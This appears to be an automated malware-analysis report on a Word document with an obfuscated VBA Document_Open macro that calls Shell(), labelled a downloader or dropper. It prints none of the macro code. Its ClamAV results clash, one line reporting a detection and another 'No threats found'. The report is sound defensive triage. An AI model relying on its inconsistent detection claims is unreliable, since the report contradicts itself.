Verdict: MALICIOUS
Risk Score: 184

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that calls the Shell() function, indicating dropper or downloader functionality. The ClamAV heuristic identifies it as 'Doc.Dropper.Agent-7345546-0'. The macro code appears to be obfuscated, but the presence of Shell() and the heuristic hits strongly suggest it is designed to download and execute a secondary payload.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-7345546-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-7345546-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20568 bytes |

SHA-256: c7be3ed862865d3a2b2a7fda2a689225b2d407e9ec53f3a44b6eb2996bd013cc

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))

Preview script: First 1,000 lines of the extracted script